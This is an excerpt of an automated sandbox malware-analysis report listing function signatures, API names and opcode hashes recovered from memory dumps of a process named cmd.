                              • API ID: Frame$EmptyHandler3::StateUnwind__except_validate_context_record
                              • String ID: csm$csm
                              • API String ID: 3896166516-3733052814
                              • Opcode ID: eaa3ef4f1944c03eb6c37dfa640564b8b9e6afec5d94ced6829f034688bc3bbb
                              • Instruction ID: ee1abaaf2dfbdb1c1c46bb78de78b7288e762e3f5d27076a146f20e85247ee3e
                              • Opcode Fuzzy Hash: eaa3ef4f1944c03eb6c37dfa640564b8b9e6afec5d94ced6829f034688bc3bbb
                              • Instruction Fuzzy Hash: A15170B2920680ABFF74ABB596483587BA1F354B98F144115DE8D4BBA9CB3CC8E0C701
                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000013.00000002.2994535637.0000022413931000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000022413930000, based on PE: true
                              • Associated: 00000013.00000002.2993151918.0000022413930000.00000002.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000013.00000002.2996214908.0000022413945000.00000002.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000013.00000002.2997607093.0000022413950000.00000004.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000013.00000002.2998872667.0000022413952000.00000002.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000013.00000002.3000146971.0000022413959000.00000002.00001000.00020000.00000000.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_19_2_22413930000_cmd.jbxd
                              Similarity
                              • API ID: CallEncodePointerTranslator
                              • String ID: MOC$RCC
                              • API String ID: 3544855599-2084237596
                              • Opcode ID: 17958f67cb0a17abd9ffe4ca5dea2288dd301e2c3aed8a7adc88a0e8f0f7cfb5
                              • Instruction ID: bb4eb9c6bdce0418474fd4538fa7d0d2fc701835a97049d7c44317ee791c0f2d
                              • Opcode Fuzzy Hash: 17958f67cb0a17abd9ffe4ca5dea2288dd301e2c3aed8a7adc88a0e8f0f7cfb5
                              • Instruction Fuzzy Hash: 1361A4B2914BC495EF209F65E54439ABBA0F785798F044215EF9D17B69DB7CC1E0CB00
                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000013.00000002.2986413017.0000022413901000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000022413900000, based on PE: true
                              • Associated: 00000013.00000002.2985211590.0000022413900000.00000002.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000013.00000002.2987944500.0000022413915000.00000002.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000013.00000002.2989139786.0000022413920000.00000004.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000013.00000002.2990508739.0000022413922000.00000002.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000013.00000002.2991786558.0000022413929000.00000002.00001000.00020000.00000000.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_19_2_22413900000_cmd.jbxd
                              Similarity
                              • API ID: FileName$CloseFindHandleModuleOpenPathProcesslstrlen
                              • String ID: pid_
                              • API String ID: 517849248-4147670505
                              • Opcode ID: 351c56d785df20298bfbc2128b4df5e5f7d51d179e69475368e405930b6507af
                              • Instruction ID: 3611ceec56e323fc947161139e53b622406e43c6aa7511f1765b8d6c23399bf2
                              • Opcode Fuzzy Hash: 351c56d785df20298bfbc2128b4df5e5f7d51d179e69475368e405930b6507af
                              • Instruction Fuzzy Hash: 5E118411330B81B1FF10ABA5E84D35B7AA8F748788F844425EE4D9B69CEF68CDA5C740
                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000013.00000002.2994535637.0000022413931000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000022413930000, based on PE: true
                              • Associated: 00000013.00000002.2993151918.0000022413930000.00000002.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000013.00000002.2996214908.0000022413945000.00000002.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000013.00000002.2997607093.0000022413950000.00000004.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000013.00000002.2998872667.0000022413952000.00000002.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000013.00000002.3000146971.0000022413959000.00000002.00001000.00020000.00000000.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_19_2_22413930000_cmd.jbxd
                              Similarity
                              • API ID: FileName$CloseFindHandleModuleOpenPathProcesslstrlen
                              • String ID: pid_
                              • API String ID: 517849248-4147670505
                              • Opcode ID: 351c56d785df20298bfbc2128b4df5e5f7d51d179e69475368e405930b6507af
                              • Instruction ID: 49a6605f66453eff468d2f8e1539a94aa27cd82fad4c9b8cc26adac6d25f5cff
                              • Opcode Fuzzy Hash: 351c56d785df20298bfbc2128b4df5e5f7d51d179e69475368e405930b6507af
                              • Instruction Fuzzy Hash: B4117591320781B1FF10BBB5EA4935A7AA4F744748F8040259E4DCB7ACEF68CDA5C700
                              APIs
                              Memory Dump Source
                              • Source File: 00000013.00000002.2986413017.0000022413901000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000022413900000, based on PE: true
                              • Associated: 00000013.00000002.2985211590.0000022413900000.00000002.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000013.00000002.2987944500.0000022413915000.00000002.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000013.00000002.2989139786.0000022413920000.00000004.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000013.00000002.2990508739.0000022413922000.00000002.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000013.00000002.2991786558.0000022413929000.00000002.00001000.00020000.00000000.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_19_2_22413900000_cmd.jbxd
                              Similarity
                              • API ID: FileWrite$ConsoleErrorLastOutput
                              • String ID:
                              • API String ID: 2718003287-0
                              • Opcode ID: 6e2b0015a5e192ecbb3898a491d5c4d6065fa3f656e88a841fb9fa74fea56143
                              • Instruction ID: e90e25d722bc9b7c059eedbecd0ddb1c3ae8768c5d7eb752f8140c16410a34fd
                              • Opcode Fuzzy Hash: 6e2b0015a5e192ecbb3898a491d5c4d6065fa3f656e88a841fb9fa74fea56143
                              • Instruction Fuzzy Hash: E9D1F372724A8499EB11EFA5D4443DC3BB1F344BACF404156CE9EABB99DB34C4A6C340
                              APIs
                              Memory Dump Source
                              • Source File: 00000013.00000002.2994535637.0000022413931000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000022413930000, based on PE: true
                              • Associated: 00000013.00000002.2993151918.0000022413930000.00000002.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000013.00000002.2996214908.0000022413945000.00000002.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000013.00000002.2997607093.0000022413950000.00000004.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000013.00000002.2998872667.0000022413952000.00000002.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000013.00000002.3000146971.0000022413959000.00000002.00001000.00020000.00000000.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_19_2_22413930000_cmd.jbxd
                              Similarity
                              • API ID: FileWrite$ConsoleErrorLastOutput
                              • String ID:
                              • API String ID: 2718003287-0
                              • Opcode ID: 6e2b0015a5e192ecbb3898a491d5c4d6065fa3f656e88a841fb9fa74fea56143
                              • Instruction ID: c6b735cc79f61ca4d76ef9804721cc578e0c1a7a6758db37dc559cb32d37723e
                              • Opcode Fuzzy Hash: 6e2b0015a5e192ecbb3898a491d5c4d6065fa3f656e88a841fb9fa74fea56143
                              • Instruction Fuzzy Hash: 05D1E032724A8499EB10DFF5E6482EC3BB1F354B9CF404256DE9D9BB99DA34C1A6C340
                              APIs
                              Memory Dump Source
                              • Source File: 00000013.00000002.2986413017.0000022413901000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000022413900000, based on PE: true
                              • Associated: 00000013.00000002.2985211590.0000022413900000.00000002.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000013.00000002.2987944500.0000022413915000.00000002.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000013.00000002.2989139786.0000022413920000.00000004.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000013.00000002.2990508739.0000022413922000.00000002.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000013.00000002.2991786558.0000022413929000.00000002.00001000.00020000.00000000.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_19_2_22413900000_cmd.jbxd
                              Similarity
                              • API ID: Heap$Process$Free
                              • String ID:
                              • API String ID: 3168794593-0
                              • Opcode ID: cb2f76e5a78e817a83185cac88bc62ecdb24cbc77a47800d9d0442b9e443284d
                              • Instruction ID: 06ef5d83edd5f3a03675846f7866c53c974332197a394339226ba4a2d81d23e1
                              • Opcode Fuzzy Hash: cb2f76e5a78e817a83185cac88bc62ecdb24cbc77a47800d9d0442b9e443284d
                              • Instruction Fuzzy Hash: B6014032620B90EADB55EFA6E80814A7BA5F788F94F0A4025DF4D5772CDF34D4A1C740
                              APIs
                              Memory Dump Source
                              • Source File: 00000013.00000002.2994535637.0000022413931000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000022413930000, based on PE: true
                              • Associated: 00000013.00000002.2993151918.0000022413930000.00000002.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000013.00000002.2996214908.0000022413945000.00000002.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000013.00000002.2997607093.0000022413950000.00000004.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000013.00000002.2998872667.0000022413952000.00000002.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000013.00000002.3000146971.0000022413959000.00000002.00001000.00020000.00000000.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_19_2_22413930000_cmd.jbxd
                              Similarity
                              • API ID: Heap$Process$Free
                              • String ID:
                              • API String ID: 3168794593-0
                              • Opcode ID: cb2f76e5a78e817a83185cac88bc62ecdb24cbc77a47800d9d0442b9e443284d
                              • Instruction ID: 18afde9bed60ccd935e5b55ec6f5e682db3d86c93d91e079319e42df8b0475ad
                              • Opcode Fuzzy Hash: cb2f76e5a78e817a83185cac88bc62ecdb24cbc77a47800d9d0442b9e443284d
                              • Instruction Fuzzy Hash: 0201ED72620B90EADB14EFA6E90815A7BA1F78CF84B054025DF4D57B2CDF34D4A1C740
                              APIs
                              • GetConsoleMode.KERNEL32(?,?,?,?,?,?,?,?,?,?,00000000,00000000,00000224139128DF), ref: 0000022413912A12
                              Memory Dump Source
                              • Source File: 00000013.00000002.2986413017.0000022413901000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000022413900000, based on PE: true
                              • Associated: 00000013.00000002.2985211590.0000022413900000.00000002.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000013.00000002.2987944500.0000022413915000.00000002.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000013.00000002.2989139786.0000022413920000.00000004.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000013.00000002.2990508739.0000022413922000.00000002.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000013.00000002.2991786558.0000022413929000.00000002.00001000.00020000.00000000.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_19_2_22413900000_cmd.jbxd
                              Similarity
                              • API ID: ConsoleMode
                              • String ID:
                              • API String ID: 4145635619-0
                              • Opcode ID: 84db17c61f8644ba0c376578cd7e648754f889cd263a50ace8e4a54d342680a6
                              • Instruction ID: 73093632e0e142b48e1b777c0bb633ff75799070bd1babf7f68400083f0437b1
                              • Opcode Fuzzy Hash: 84db17c61f8644ba0c376578cd7e648754f889cd263a50ace8e4a54d342680a6
                              • Instruction Fuzzy Hash: 7591DFB2620655A9FF60BFA594583AD3FA0F345BACF444146DE8E6B68DDB34C8E5C300
                              APIs
                              • GetConsoleMode.KERNEL32(?,?,?,?,?,?,?,?,?,?,00000000,00000000,00000224139428DF), ref: 0000022413942A12
                              Memory Dump Source
                              • Source File: 00000013.00000002.2994535637.0000022413931000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000022413930000, based on PE: true
                              • Associated: 00000013.00000002.2993151918.0000022413930000.00000002.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000013.00000002.2996214908.0000022413945000.00000002.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000013.00000002.2997607093.0000022413950000.00000004.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000013.00000002.2998872667.0000022413952000.00000002.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000013.00000002.3000146971.0000022413959000.00000002.00001000.00020000.00000000.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_19_2_22413930000_cmd.jbxd
                              Similarity
                              • API ID: ConsoleMode
                              • String ID:
                              • API String ID: 4145635619-0
                              • Opcode ID: 84db17c61f8644ba0c376578cd7e648754f889cd263a50ace8e4a54d342680a6
                              • Instruction ID: 1378d3b1fe1f29c3796363717ec6ebce30c9ed187dfa28b51c9cc34399e768c1
                              • Opcode Fuzzy Hash: 84db17c61f8644ba0c376578cd7e648754f889cd263a50ace8e4a54d342680a6
                              • Instruction Fuzzy Hash: 7791DE32630651A9FF64AFA5D6583AD3FA0B345B8CF444146DE8E5BA8DDA34C4E5C300
                              APIs
                              Memory Dump Source
                              • Source File: 00000013.00000002.2994535637.0000022413931000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000022413930000, based on PE: true
                              • Associated: 00000013.00000002.2993151918.0000022413930000.00000002.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000013.00000002.2996214908.0000022413945000.00000002.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000013.00000002.2997607093.0000022413950000.00000004.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000013.00000002.2998872667.0000022413952000.00000002.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000013.00000002.3000146971.0000022413959000.00000002.00001000.00020000.00000000.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_19_2_22413930000_cmd.jbxd
                              Similarity
                              • API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
                              • String ID:
                              • API String ID: 2933794660-0
                              • Opcode ID: 61e3724c6de8b17bf9a8ee54dd3d1bb067003c5f3b921a84847ee34476b0adea
                              • Instruction ID: 790c05aa9cc544d3e608751ecb24931b805024f15db756386992ce453d0c1eac
                              • Opcode Fuzzy Hash: 61e3724c6de8b17bf9a8ee54dd3d1bb067003c5f3b921a84847ee34476b0adea
                              • Instruction Fuzzy Hash: 0011FE26721F049AEF00DFB0E8593A937A4F759758F441E25EE6D4ABA8DB78C1A4C340
                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000013.00000002.2986413017.0000022413901000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000022413900000, based on PE: true
                              • Associated: 00000013.00000002.2985211590.0000022413900000.00000002.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000013.00000002.2987944500.0000022413915000.00000002.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000013.00000002.2989139786.0000022413920000.00000004.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000013.00000002.2990508739.0000022413922000.00000002.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000013.00000002.2991786558.0000022413929000.00000002.00001000.00020000.00000000.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_19_2_22413900000_cmd.jbxd
                              Similarity
                              • API ID: FileType
                              • String ID: \\.\pipe\
                              • API String ID: 3081899298-91387939
                              • Opcode ID: ff4f71be338cb0fe5049debcf5759f5669753ac72572a0d232f439ca1a0f8997
                              • Instruction ID: 2837381cd1c3516549779cc649aad48412e52821d2070d6289c1e516bc1f7ffb
                              • Opcode Fuzzy Hash: ff4f71be338cb0fe5049debcf5759f5669753ac72572a0d232f439ca1a0f8997
                              • Instruction Fuzzy Hash: B671D876224B8165EF75EFA699883AA7F98F344BC8F540016DD8D5BB8CDE34C9A0C700
                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000013.00000002.2994535637.0000022413931000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000022413930000, based on PE: true
                              • Associated: 00000013.00000002.2993151918.0000022413930000.00000002.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000013.00000002.2996214908.0000022413945000.00000002.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000013.00000002.2997607093.0000022413950000.00000004.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000013.00000002.2998872667.0000022413952000.00000002.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000013.00000002.3000146971.0000022413959000.00000002.00001000.00020000.00000000.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_19_2_22413930000_cmd.jbxd
                              Similarity
                              • API ID: FileType
                              • String ID: \\.\pipe\
                              • API String ID: 3081899298-91387939
                              • Opcode ID: ff4f71be338cb0fe5049debcf5759f5669753ac72572a0d232f439ca1a0f8997
                              • Instruction ID: 13a02b1137ed93ea91965a0b178412f59ef6792d8e1452a4d0c8cfdbb5e6d548
                              • Opcode Fuzzy Hash: ff4f71be338cb0fe5049debcf5759f5669753ac72572a0d232f439ca1a0f8997
                              • Instruction Fuzzy Hash: 2071C8B222474162EF34AEB6DA483AA7F95F345788F500016DD8D9BBACDE34C9A0C700
                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000013.00000003.2594733035.00000224138D0000.00000040.00000400.00020000.00000000.sdmp, Offset: 00000224138D0000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_19_3_224138d0000_cmd.jbxd
                              Similarity
                              • API ID: CurrentImageNonwritable__except_validate_context_record
                              • String ID: csm
                              • API String ID: 3242871069-1018135373
                              • Opcode ID: b80ff68eb806cf2b6af9fc4dc9cc0d46113cdbfcc8a0c2797bbdc03f84945619
                              • Instruction ID: cff280e3251eff1c2608624c9ae8b8860dd54545dc080a4d5a976f24c8443344
                              • Opcode Fuzzy Hash: b80ff68eb806cf2b6af9fc4dc9cc0d46113cdbfcc8a0c2797bbdc03f84945619
                              • Instruction Fuzzy Hash: AA51B432321A00AADF54EBA9E44CB6D7FE1E354B9CF154125DA4E4B788D778E8E1C700
                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000013.00000003.2594733035.00000224138D0000.00000040.00000400.00020000.00000000.sdmp, Offset: 00000224138D0000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_19_3_224138d0000_cmd.jbxd
                              Similarity
                              • API ID: CallTranslator
                              • String ID: MOC$RCC
                              • API String ID: 3163161869-2084237596
                              • Opcode ID: 17958f67cb0a17abd9ffe4ca5dea2288dd301e2c3aed8a7adc88a0e8f0f7cfb5
                              • Instruction ID: cce048554f4d0b4e2e1e2fbad33d5d16701f1ce3b0f1d35305cc441cae5c0a54
                              • Opcode Fuzzy Hash: 17958f67cb0a17abd9ffe4ca5dea2288dd301e2c3aed8a7adc88a0e8f0f7cfb5
                              • Instruction Fuzzy Hash: 5E61AF32508BC492EB71AF55E44479ABBE1F785B98F044215EB9C4BB99CB7CE1E0CB00
                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000013.00000002.2986413017.0000022413901000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000022413900000, based on PE: true
                              • Associated: 00000013.00000002.2985211590.0000022413900000.00000002.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000013.00000002.2987944500.0000022413915000.00000002.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000013.00000002.2989139786.0000022413920000.00000004.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000013.00000002.2990508739.0000022413922000.00000002.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000013.00000002.2991786558.0000022413929000.00000002.00001000.00020000.00000000.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_19_2_22413900000_cmd.jbxd
                              Similarity
                              • API ID: FileType
                              • String ID: \\.\pipe\
                              • API String ID: 3081899298-91387939
                              • Opcode ID: bd677bffd8830a8f95fe5f2a714728342c990f231eb0fef724be370d7bbf4432
                              • Instruction ID: 9e0a546ed7521c8651cb333f3f4ba9560b8cb5827c6b7fb3d3526328628ec222
                              • Opcode Fuzzy Hash: bd677bffd8830a8f95fe5f2a714728342c990f231eb0fef724be370d7bbf4432
                              • Instruction Fuzzy Hash: 18513A26224780A1EE24FFBDA45C3AA7FA9F384798F540065CD8D5BB8DDE35D4A0C740
                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000013.00000002.2994535637.0000022413931000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000022413930000, based on PE: true
                              • Associated: 00000013.00000002.2993151918.0000022413930000.00000002.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000013.00000002.2996214908.0000022413945000.00000002.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000013.00000002.2997607093.0000022413950000.00000004.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000013.00000002.2998872667.0000022413952000.00000002.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000013.00000002.3000146971.0000022413959000.00000002.00001000.00020000.00000000.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_19_2_22413930000_cmd.jbxd
                              Similarity
                              • API ID: FileType
                              • String ID: \\.\pipe\
                              • API String ID: 3081899298-91387939
                              • Opcode ID: bd677bffd8830a8f95fe5f2a714728342c990f231eb0fef724be370d7bbf4432
                              • Instruction ID: beb9c8115fcda13118d4bb4e043656ec6190b80f45fe19bb7273f8be211ce167
                              • Opcode Fuzzy Hash: bd677bffd8830a8f95fe5f2a714728342c990f231eb0fef724be370d7bbf4432
                              • Instruction Fuzzy Hash: 69515CA622438061EE24FEBDE65C3AA7F61F784B88F040065CD8E4BB6DDE35D4A0C740
                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000013.00000002.2986413017.0000022413901000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000022413900000, based on PE: true
                              • Associated: 00000013.00000002.2985211590.0000022413900000.00000002.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000013.00000002.2987944500.0000022413915000.00000002.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000013.00000002.2989139786.0000022413920000.00000004.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000013.00000002.2990508739.0000022413922000.00000002.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000013.00000002.2991786558.0000022413929000.00000002.00001000.00020000.00000000.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_19_2_22413900000_cmd.jbxd
                              Similarity
                              • API ID: ErrorFileLastWrite
                              • String ID: U
                              • API String ID: 442123175-4171548499
                              • Opcode ID: 608dbfc7eceb37b1c9531a955daf284e11a95c8252675cdfa91653c1712c9be4
                              • Instruction ID: 9bd4dd1df9da1b090b21d0887f56619b23c694aeacd54893341cfa2b91bd80cb
                              • Opcode Fuzzy Hash: 608dbfc7eceb37b1c9531a955daf284e11a95c8252675cdfa91653c1712c9be4
                              • Instruction Fuzzy Hash: BA41DA73635A8496EF10FFA5E44879ABBA4F348798F444121EE8D9B75CEB38C891C740
                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000013.00000002.2994535637.0000022413931000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000022413930000, based on PE: true
                              • Associated: 00000013.00000002.2993151918.0000022413930000.00000002.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000013.00000002.2996214908.0000022413945000.00000002.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000013.00000002.2997607093.0000022413950000.00000004.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000013.00000002.2998872667.0000022413952000.00000002.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000013.00000002.3000146971.0000022413959000.00000002.00001000.00020000.00000000.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_19_2_22413930000_cmd.jbxd
                              Similarity
                              • API ID: ErrorFileLastWrite
                              • String ID: U
                              • API String ID: 442123175-4171548499
                              • Opcode ID: 608dbfc7eceb37b1c9531a955daf284e11a95c8252675cdfa91653c1712c9be4
                              • Instruction ID: 36b8cff68707d9628293121fe0c1dbf3c3d93edf5e456a2889d7a03b9b792581
                              • Opcode Fuzzy Hash: 608dbfc7eceb37b1c9531a955daf284e11a95c8252675cdfa91653c1712c9be4
                              • Instruction Fuzzy Hash: 3A41EA72635B8096EF10EFA9E548799BBA0F348788F404122EE8D8B75CEB38C491C740
                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000013.00000002.2986413017.0000022413901000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000022413900000, based on PE: true
                              • Associated: 00000013.00000002.2985211590.0000022413900000.00000002.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000013.00000002.2987944500.0000022413915000.00000002.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000013.00000002.2989139786.0000022413920000.00000004.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000013.00000002.2990508739.0000022413922000.00000002.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000013.00000002.2991786558.0000022413929000.00000002.00001000.00020000.00000000.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_19_2_22413900000_cmd.jbxd
                              Similarity
                              • API ID: ExceptionFileHeaderRaise
                              • String ID: csm
                              • API String ID: 2573137834-1018135373
                              • Opcode ID: 0fa69785a085c04948c157334ebe0f5d9795e11839ffdc4193b8483db1e39a2c
                              • Instruction ID: a2502da9e4b0420ef9ba5f9ea7c5f89a266a9f96d7b8d6db8c10b0d1bf8ba756
                              • Opcode Fuzzy Hash: 0fa69785a085c04948c157334ebe0f5d9795e11839ffdc4193b8483db1e39a2c
                              • Instruction Fuzzy Hash: A7113032224B4092EF619F15F44825ABBE5F788B98F584220DE8D0B769DF3CC5A1CB00
                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000013.00000002.2994535637.0000022413931000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000022413930000, based on PE: true
                              • Associated: 00000013.00000002.2993151918.0000022413930000.00000002.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000013.00000002.2996214908.0000022413945000.00000002.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000013.00000002.2997607093.0000022413950000.00000004.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000013.00000002.2998872667.0000022413952000.00000002.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000013.00000002.3000146971.0000022413959000.00000002.00001000.00020000.00000000.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_19_2_22413930000_cmd.jbxd
                              Similarity
                              • API ID: ExceptionFileHeaderRaise
                              • String ID: csm
                              • API String ID: 2573137834-1018135373
                              • Opcode ID: 0fa69785a085c04948c157334ebe0f5d9795e11839ffdc4193b8483db1e39a2c
                              • Instruction ID: 61ee6502b056ed4271f4d9004b11703078a7d9ccdac39f371625d6ea6e2b4754
                              • Opcode Fuzzy Hash: 0fa69785a085c04948c157334ebe0f5d9795e11839ffdc4193b8483db1e39a2c
                              • Instruction Fuzzy Hash: 5D113372614B4092DF119F65F54435ABBE5F788B98F584221DE8D0BB68DF3CC5A1C700
                              APIs
                              Memory Dump Source
                              • Source File: 00000013.00000002.2994535637.0000022413931000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000022413930000, based on PE: true
                              • Associated: 00000013.00000002.2993151918.0000022413930000.00000002.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000013.00000002.2996214908.0000022413945000.00000002.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000013.00000002.2997607093.0000022413950000.00000004.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000013.00000002.2998872667.0000022413952000.00000002.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000013.00000002.3000146971.0000022413959000.00000002.00001000.00020000.00000000.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_19_2_22413930000_cmd.jbxd
                              Similarity
                              • API ID: Heap$Process$AllocFree
                              • String ID:
                              • API String ID: 756756679-0
                              • Opcode ID: 4c9b2301a415d0f0b496c555fe445cf1af4f6cd5e16f1feadd66e218500f58a3
                              • Instruction ID: c6dbe2bbbba02f5c69fdee24eb7ee8ee14999c64b8463b219ee1bf7c5bbfd1e0
                              • Opcode Fuzzy Hash: 4c9b2301a415d0f0b496c555fe445cf1af4f6cd5e16f1feadd66e218500f58a3
                              • Instruction Fuzzy Hash: 1B116161621B8095EE14EBA6E50815A7BF0F789FD4F588124DE4E5B779EF38D492C300
                              APIs
                              Memory Dump Source
                              • Source File: 00000013.00000002.2986413017.0000022413901000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000022413900000, based on PE: true
                              • Associated: 00000013.00000002.2985211590.0000022413900000.00000002.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000013.00000002.2987944500.0000022413915000.00000002.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000013.00000002.2989139786.0000022413920000.00000004.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000013.00000002.2990508739.0000022413922000.00000002.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000013.00000002.2991786558.0000022413929000.00000002.00001000.00020000.00000000.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_19_2_22413900000_cmd.jbxd
                              Similarity
                              • API ID: Heap$AllocProcess
